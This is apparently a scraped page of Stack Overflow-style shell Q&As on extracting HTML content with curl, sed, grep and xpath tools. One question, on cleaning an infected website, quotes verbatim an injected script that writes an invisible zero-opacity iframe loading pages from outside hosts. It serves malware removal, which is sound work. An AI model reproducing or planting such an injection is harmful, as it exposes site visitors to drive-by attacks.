How to specify and extract html element by curl - linux

when I tried to curl some pages.
curl http://test.com
I can get like following result
<html>
<body>
<div>
<dl>
<dd> 10 times </dd>
</dl>
</div>
</body>
</html>
my desired result is like simply 10 times..
Are there any good way to achieve this ?
If someone has opinion please let me know
Thanks

If you are are unable to use a html parser for what ever reason, for your given simple html example, you could use:
curl http://test.com | sed -rn 's#(^.*<dd>)(.*)(</dd>)#\2#p'
Redirect the output of the curl command into sed and enable regular expression interpretation with -r or -E. Split the lines into three sections and substitute the line for the second section only, printing the result.

Related

extract a specific word between two values

I curl a html page and stock output into variable, so I try to extract a word between two value, but I failed.
</tr> <tr> <td><a AAA</td>
<td>Thu Aug 30 09:59:36 UTC 2018</td> <td align="right"> 2247366 </td>
<td></td> </tr> <tr> <td>1.1.22</td> <td>Thu Aug 30 09:59:36
UTC 2018</td> <td align="right"> 5 </td> <td></td> </tr> </table>
</body> </html>
content=$(curl -s https://test/one/)
echo $content | sed -E 's_.*one/([^"]+).*_\1_'
I try to catch value after one/ and before ", so I want to extract AAA, 1.1.22,...
$ ... | sed -E 's_.*one/([^"]+).*_\1_'
AAA
BBB
since you have slash in your content, better to choose a different delimiter, here I used _.
UPDATE
Since you changed the input file format dramatically, here is the updated script
$ echo "$contents" | sed -nE '/one/s_.*one/([^"]+).*_\1_p'
AAA
1.1.22
Don't parse XML/HTML with regex, use a proper XML/HTML parser and a powerful xpath query.
theory :
According to the compiling theory, XML/HTML can't be parsed using regex based on finite state machine. Due to hierarchical construction of XML/HTML you need to use a pushdown automaton and manipulate LALR grammar using tool like YACC.
realLife©®™ everyday tool in a shell :
You can use one of the following :
xmllint often installed by default with libxml2, xpath1 (check my wrapper to have newlines delimited output
xmlstarlet can edit, select, transform... Not installed by default, xpath1
xpath installed via perl's module XML::XPath, xpath1
xidel xpath3
saxon-lint my own project, wrapper over #Michael Kay's Saxon-HE Java library, xpath3
or you can use high level languages and proper libs, I think of :
python's lxml (from lxml import etree)
perl's XML::LibXML, XML::XPath, XML::Twig::XPath, HTML::TreeBuilder::XPath
ruby nokogiri, check this example
php DOMXpath, check this example
Check: Using regular expressions with HTML tags
Example using xpath :
//a[contains(#href, "https://test/sites/two/one")]

Bash Script Linux print html Tags end

I have a bash script and it include 2 variables, and like to print this on html, but the problem it just work the open tag and no the ending or closing tag:
echo <h2>${ADMIN_STATUS}</h2>
So the value on "ADMIN_STATUS" it is show on H2, the the html or bash no close and show on text "</h2>"
I mean the bash no close the <h2>, the </h2> no are working.
any idea?
Thank you
The < and > are being treated as redirection operators. You need to quote them, which is most easily done by quoting the entire string:
echo "<h2>${ADMIN_STATUS}</h2>"

Cleaning up iframe malware

I'm helping someone clean up a malware infection on a site and I'm having a difficult time correctly matching some strings in sed so I can create a script to mass search and replace / remove it.
The strings are:
<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>
<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://vidintex.com/includes/class.pop.php"></iframe></div>');</script>
<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>
I can't seem to figure out how to escape the various characters in those lines...
If I try to just say delete the entire line if it matches http://vidintex.com/includes/class.pop.php it also deletes the closing html </body> in the .html files as well.
So I need to be able to match this entire line in sed:
<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>
Any help would be greatly appreciated!
You can try doing this :
sed -i '/vidintex.com\/includes\/class.pop.php/d' files*
This will delete all lines containing vidintex.com/includes/class.pop.php
You may start using SMScanner at sourceforge! It will solve your problems instantly
Similar to Looking for script to delete iframe malware from linux server, you can look for the script tag that is placed next to the final body tag and replace that with just the body tag. This script will find all the affected files and remove the final script.
It has the potential that it might find genuine files with scripts at the end - so first check that the grep for files only finds infected files.
# grep recursively for text
# escape all spaces in file names
# global search and replace with just body tag
grep -Rl "</script></body>" * | sed 's/ /\ /g' | xargs sed -i 's/<script .*><\/script><\/body>/<\/body>/g'

Trying to 'grep' links from downloaded html pages in bash shell environment without cut, sed, tr commands (only e/grep)

In Linux shell, I am trying to return links to JPG files from the downloaded HTML script file. So far I only got to this point:
grep 'http://[:print:]*.jpg' 'www_page.html'
I don't want to use auxiliary commands like 'tr', 'cut', 'sed' etc...'lynx' is okay!
Using grep alone without massaging the file is doable but not recommended as many have pointed out in the comments.
If you can loosen up your requirements a bit then you can use html tidy to massage the downloaded HTML file so that each html entities are on a single line so that the regular expression can be simpler like you wanted, something like this:
$ tidy file.html|grep -o 'http://[[:print:]]*.jpg'
Note the use of "-o" option to grep to print only the matching part of the input

Curl Complex With Bash

Small Note: I removed the http:// from infront each link, because stackoverflow isn't allowing me to post it in original way.
I wrote a script which access to a webpage, to catch a URL and download it. One of the urls makes curl stop working and the whole URLS in the list to the same.
The script works as following:-
PAGE=$(curl -sL pageurl)
FILE_URL=$(echo $PAGE | sed -e 's/^.*<a href=\"\(.*\)\">\(.*\) alt="File" \/><\/a>.*$/\1/')
The FILE_URL VALUE is
URL/files/PartOne - Booke (Coll).pdf
webprod25.megashares.com/index.php?d01=3109985&lccdl=9e8e091ef33dd103&d01go=1&fln=/adobe reader exe.rar
AND SO One for others
When curl tried to catch this url it shows the following error using the debug mode of bash
++ curl -sOL 'webprod37.megashares.com/index.php?d01=3109985&lccdl=9e8e091ef33dd103&d01go=1&fln=/adobe' reader exe.rar fileshare273.depositfiles.com/auth-13023763920cd7ec18a0fdbfa8b62d35-188.165.197.50-43792102-7713641/FS273-7/PageMaker.rar -sOLJg fileshare601.depositfiles.com/auth-1302376689013d421df6c01e7f64c8d2-188.165.197.50-43801594-82379659/FS601-2/Adobe_Flash_Player_v10.3.180.65.2.rar -sOLJg 'webprod37.megashares.com/index.php?d01=de48789&lccdl=9e8e091ef33dd103&d01go=1&fln=/KAZAMIZA.COM.Adobe.Flash' Player-10.3.180.65.Beta-2.JUDGMENT DAY.rar bellatrix.oron.com/spzsttzwytpflwd76j3ne2moukomuhcdxg6llddfztqa2ztd7cplwwp457h3mxuacq3pbxzs/An-Beat - Mentally Insine '(Original' 'Mix).mp3'
curl: option -: is unknown
curl: try 'curl --help' or 'curl --manual' for more information
The quote marks the curl put it itself, I tried to do some workarounds like escaping url but it not works.
The basic problem seems to be that you are using $() expansion for something that looks to me like a multi line value. You should try iterating over each line.
The other problem looks like one of improper quoting of URLs containing spaces. There's a lone dash (-) in "An-Beat - Mentally Insine"
Oh, one more problem: The sed part to catch the href="..." contents only works if there's exactly one href on the line. If there are two or more, your \(.*\) will match everything else up to the last href. You should use something like href="\([^"]*\)", matching "any number of non-doublequotes followed by a doublequote".
Quote your variables as in:
pageurl='the url'
PAGE=$(curl -sL "$pageurl")
FILE_URL=$(echo "$PAGE" | sed -e 's/^.*<a href=\"\(.*\)\">\(.*\) alt="File" \/><\/a>.*$/\1/')
Otherwise, shell expansion will occur. The error "option -: is unknown" comes from the final part:
An-Beat - Mentally Insine
Because you didn't apply quotes to it, it got parsed as arguments, which you can clearly see in the syntax-highlighted code.

Resources